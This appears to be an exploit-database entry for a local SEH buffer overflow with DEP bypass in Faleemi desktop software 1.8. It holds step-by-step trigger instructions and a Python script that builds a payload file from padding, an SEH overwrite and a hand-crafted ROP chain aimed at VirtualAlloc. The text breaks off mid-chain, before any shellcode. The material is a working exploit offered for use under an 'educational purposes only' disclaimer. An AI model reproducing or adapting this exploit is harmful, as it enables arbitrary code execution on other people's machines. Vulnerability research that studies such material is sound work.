Exploits / Vulnerability Discovered : 2019-01-28 |
Type : local |
Platform : windows
This exploit / vulnerability, Faleemi desktop software 1.8 local buffer overflow (SEH) (DEP bypass), is for educational purposes only; if you use it, you do so at your own risk!
# PoC
# 1. run script
# 2. open/copy contents of faleemidep.txt
# 3. open app, click on System Setup
# 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field
# 5. click on save
# 6. pop calc
# manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' findings
# practicing dep bypass by not using auto generated mona.py ropchains
# original seh poc from Gionathan "John" Reale, EDB: 45402
# badchars: \x00\x0a\x0d\x2f
import struct
filename = "faleemidep.txt"
junk = "A" * 264
#0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN
seh = "\x7e\xea\x01\x60"
fill = "C"*524
#VirtualAlloc()
#EDI = ROP NOP (RETN)
rop = struct.pack('<L',0x60018221) # POP EDI # RETN
rop += struct.pack('<L',0x60018222) # ROP-NOP
#ECX = flProtect (0x40)
rop += struct.pack('<L',0x60047e71) # POP ECX # RETN
rop += struct.pack('<L',0xffffffff)
for i in range(0,65): rop += struct.pack('<L',0x6004bcc7) # INC ECX # RETN
rop += struct.pack('<L',0xF33B8C98)
rop += struct.pack('<L',0x6004e5ce) # ADD EDX,EBX # POP EBX # RETN 0x10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10
rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10